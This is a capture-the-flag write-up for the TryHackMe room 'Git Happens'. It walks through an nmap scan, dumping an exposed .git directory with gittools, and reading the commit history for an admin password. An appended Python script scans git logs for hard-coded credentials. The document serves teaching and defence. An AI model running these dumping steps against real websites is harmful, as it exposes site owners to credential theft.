Information
Room
Name: Git Happens
Profile: tryhackme.com
Difficulty: Easy
Description: Boss wanted me to create a prototype, so here it is! We even used something called "version control" that made deploying this really easy!
Write-up
Overview
Install the tools used in this write-up on BlackArch Linux:
$ sudo pacman -S nmap gittools
Network enumeration
Nmap service and port enumeration scan:
# Nmap 7.93 scan initiated Mon Apr 10 20:25:51 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap 10.10.47.113
Nmap scan report for 10.10.47.113
Host is up, received reset ttl 63 (0.083s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
| http-git:
| 10.10.47.113:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 10 20:26:25 2023 -- 1 IP address (1 host up) scanned in 34.60 seconds
There is only a web application.
Web discovery
The nmap script http-git already found there is a git repository exposed.
We can dump it with gittools.
$ gittools-gitdumper http://10.10.47.113/.git/ git-repo
$ cd git-repo
$ git restore .
Then we can check the history of modifications to see if there is something juicy.
There are two interesting commits with the password hash of the admin:
$ git log -p d954a99b96ff11c37a558a5d93ce52d0f3702a7d
$ git log -p bc8054d9d95854d278359a432b6d97c27e24061d
There are also two with the password in cleartext:
$ git log -p e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
$ git log -p 395e087334d613d5e423cdf8f7be27196a360459
And that's all, the room was just about finding the password.
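The same history review from the maintainer's side, as an added example that is not part of the original write-up: it parses `git log -p` output and reports added lines that look like hard-coded credentials, so they can be found and rotated before a repository is deployed. The regex, the function names and the sample log (commit ids, file name, password) are constructed for illustration.

```python
import re
import subprocess

# Heuristic (assumption): a name containing a credential keyword that is
# assigned or compared to a quoted literal of four or more characters.
SECRET_RE = re.compile(
    r"\b\w*(?:password|passwd|pwd|secret|token|api_?key)\w*\s*"
    r"(?:===?|[:=])\s*[\"']([^\"']{4,})[\"']",
    re.IGNORECASE,
)

# Constructed `git log -p` output: the newer commit removes a literal that
# the older commit added, so only the history still contains it.
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222
diff --git a/login.js b/login.js
--- a/login.js
+++ b/login.js
@@ -1,1 +1,1 @@
-if (user === "admin" && password === "Example-Pass1") {
+if (user === "admin" && (await digest(password)) === HASH) {

commit 1111111111111111111111111111111111111111
diff --git a/login.js b/login.js
--- /dev/null
+++ b/login.js
@@ -0,0 +1,1 @@
+if (user === "admin" && password === "Example-Pass1") {
"""


def find_secret_additions(log_text):
    """Return (commit, path, line) for every added line matching SECRET_RE."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            # "+++ b/<path>" names the file the following hunks modify
            path = line[6:] if line.startswith("+++ b/") else line[4:]
        elif line.startswith("+") and SECRET_RE.search(line):
            findings.append((commit, path, line[1:].strip()))
    return findings


def scan_repo(repo_dir="."):
    """Run the same check over every commit on every ref of a local clone."""
    cmd = ["git", "-C", repo_dir, "log", "-p", "--all", "--no-color"]
    out = subprocess.run(cmd, check=True, capture_output=True, text=True)
    return find_secret_additions(out.stdout)
```

A finding in an old commit means the credential is still recoverable by anyone who can read the `.git` directory, even when the current working tree is clean.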